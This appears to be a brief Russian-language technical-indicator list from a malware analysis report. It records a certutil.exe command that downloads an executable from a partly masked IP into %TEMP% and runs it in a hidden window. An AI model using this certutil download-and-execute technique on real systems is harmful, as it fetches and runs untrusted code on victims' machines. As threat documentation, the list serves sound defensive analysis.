Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://51.##5.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe %TEMP%\filename.exe
- %TEMP%\filename.exe
- http://51.##5.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://51.##5.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe %TEMP%\filename.exe' (со скрытым окном)